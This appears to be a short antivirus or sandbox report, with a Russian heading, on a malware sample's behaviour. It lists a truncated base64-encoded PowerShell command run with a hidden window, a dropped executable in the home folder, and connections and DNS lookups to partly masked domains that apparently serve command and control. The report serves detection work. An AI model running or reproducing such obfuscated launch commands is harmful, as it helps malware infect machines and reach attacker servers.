Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABZAGwAZQByAGMAdgB0AGwAPQAnAFMAdABxAGcAaQB2AHQAawBrACcAOwAkAFoAegBrAGEAYgBmAGcAbABiACAAPQAgACcAOQAxAD...
- %HOMEPATH%\914.exe
- %HOMEPATH%\914.exe
- 'zh.sg':443
- 'dp##nce.org':443
- 'da##14.com':443
- 'zh.sg':443
- 'da##14.com':443
- DNS ASK zh.sg
- DNS ASK dp##nce.org
- DNS ASK da##14.com
- DNS ASK we####eronline.com
- DNS ASK co####t360bd.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABZAGwAZQByAGMAdgB0AGwAPQAnAFMAdABxAGcAaQB2AHQAawBrACcAOwAkAFoAegBrAGEAYgBmAGcAbABiACAAPQAgACcAOQAxAD...' (со скрытым окном)